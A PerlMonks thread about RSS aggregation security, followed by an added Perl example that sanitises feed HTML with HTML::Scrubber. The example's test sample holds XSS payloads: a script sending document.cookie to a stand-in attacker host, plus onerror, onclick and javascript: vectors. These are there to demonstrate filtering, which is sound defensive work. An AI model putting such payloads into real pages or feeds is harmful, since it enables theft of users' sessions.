BlenderHead has asked for the wisdom of the Perl Monks concerning the following question:

Hello World:

This is a follow through question to my post over here:

http://www.perlmonks.org/?node_id=807880

I typically use forums and mailing lists for discussion, and I am not an experienced blogger. I'd like to try some blogging with RSS, however, so please excuse me if these questions sound naive. Just trying to keep things safe.

1 - TRUE or FALSE: The RSS security problems people explained in response to my previous post seem only to pertain to incoming (i.e. aggregated) data. In other words, I can still generate any kind of feed I want without compromising security, right?

2 - TRUE OR FALSE: As per aggregating from various feeds, I can choose which feeds to subscribe to, so it would seem that if the feed is a trusted source (e.g. like another one of your own sites), then one could aggregate off of those feeds without having to worry about hostile content. Is that correct?

3 - TRUE OR FALSE: If one is going to aggregate information from a relatively unknown source, then one is going to want to make sure your RSS aggregator scripts filter out anything but the most basic HTML tags.

The benefit in these questions seems to be that - if they are true - 1.) one can still create any kind of feed one wants, even allowing others to read it, and 2.) one can also propound any kind of trusted aggregated information, but, if the source isn't well known, then program the aggregator to filter out hostile content.

Like I said, I am new to blogging, but it sounds like RSS is both fun and useful, so any help is much appreciated.

TIA!

BH

Re: RSS & Security (Follow Up Question)
by bellaire (Hermit) on Nov 23, 2009 at 13:12 UTC
    If I'm reading all this correctly, the responses depend heavily on how you interpret your statements.
    1. TRUE, if and only if "any kind of content you want" is free of javascript (to protect your users), and you aren't inadvertently passing session data in the HTTP_HEADERS in the aggregation (to protect yourself). Otherwise FALSE.
    2. TRUE, if and only if you assume "trusted sources" to be incapable of generating hostile content under any circumstances. Some people would never make that assumption. If you don't make that assumption, this becomes FALSE.
    3. TRUE. This is also true for sites that aren't "relatively unknown".
Re: RSS & Security (Follow Up Question)
by ww (Archbishop) on Nov 23, 2009 at 13:36 UTC
    1. TRUE so long as the only content is what you've created... and you trust your skills to ensure that you don't create anything that's "compromising security."
    2. FALSE because even a "trusted source" can be compromised.
    3. TRUE but, taken literally, that means you have to create means to handle (for example) reformatting to preserve the information provided by tags excluded from your definition of "basic."

    In any case, your penultimate paragraph references the major challenge: "to program the aggregator to (INSERT: recognize and ) filter out hostile content."

    Update: Reformatted last para above; added INSERT
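Both replies arrive at the same practical answer to question 3: the aggregator keeps an allow list of tags and attributes and discards everything else, and it does so for every feed, not only the "relatively unknown" ones. Below is an added example of that in Perl; it is not code from BlenderHead or from either reply. It assumes HTML::Scrubber and HTML::Entities from CPAN, and the feed entry it cleans is a constructed sample rather than anything taken from a real feed.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use HTML::Scrubber;
use HTML::Entities qw(encode_entities);

# Build an allow-list scrubber for HTML that arrives inside feed entries.
# Tags not listed lose their markup but keep their text; <script> and
# <style> lose both markup and contents (HTML::Scrubber's default for them).
sub make_feed_scrubber {
    return HTML::Scrubber->new(
        allow => [qw(p br b i em strong ul ol li blockquote pre code a)],
        rules => [
            # <a> keeps href only when it is an http(s) URL, so
            # "javascript:" and "data:" links never reach the browser.
            a => {
                href => qr{^https?://}i,   # attribute kept only if it matches
                '*'  => 0,                 # every other attribute on <a> dropped
            },
        ],
        # Default for tags without a rule of their own: drop the tag and all
        # attributes. Allowed tags also inherit the '*' => 0 attribute rule,
        # which is what removes onclick=, onmouseover=, style= and friends.
        default => [ 0, { '*' => 0 } ],
        comment => 0,   # strip <!-- comments -->
        process => 0,   # strip <?processing instructions?>
    );
}

# Clean one aggregated entry before it is stored or rendered. The body is
# HTML and gets scrubbed; the title is plain text, so it is entity-encoded
# rather than scrubbed (a title is never supposed to carry markup).
# $entry is a hashref with 'title' and 'body' keys (this script's own
# convention; with XML::Feed you would fill it from $e->title and
# $e->content->body).
sub clean_entry {
    my ($scrubber, $entry) = @_;
    return {
        title => encode_entities($entry->{title} // ''),
        body  => $scrubber->scrub($entry->{body} // ''),
    };
}

# Constructed sample: what a hostile entry from an untrusted feed might
# carry. Script, event handlers, javascript: URLs and CSS all appear.
my $hostile = {
    title => 'Breaking <script>alert(1)</script> news',
    body  => <<'HTML',
<p>Read <a href="http://example.com/post" onclick="steal()">this post</a>.</p>
<script>document.location='http://attacker.invalid/?c='+document.cookie</script>
<img src="x" onerror="alert(document.domain)">
<a href="javascript:alert(1)">click me</a>
<b style="background:url(javascript:alert(1))">bold</b>
<!-- tracking comment -->
HTML
};

my $scrubber = make_feed_scrubber();
my $clean    = clean_entry($scrubber, $hostile);

print "TITLE: $clean->{title}\n";
print "BODY:\n$clean->{body}\n";
```

Running it leaves the paragraph and the http link with its href, while the onclick handler, the whole <script> element, the <img> with its onerror, the javascript: href on the second link (the link survives, the href does not), the style attribute and the comment are all gone, and the title's <script> is turned into harmless entities. Two practical notes: scrub at the point where the content is rendered into your page, not only when it is fetched, so a later change to the allow list applies to entries already stored; and run your own feed through the same scrubber before publishing it, which is the cheap way to get ww's "trust your skills" condition in answer 1 without actually having to trust them.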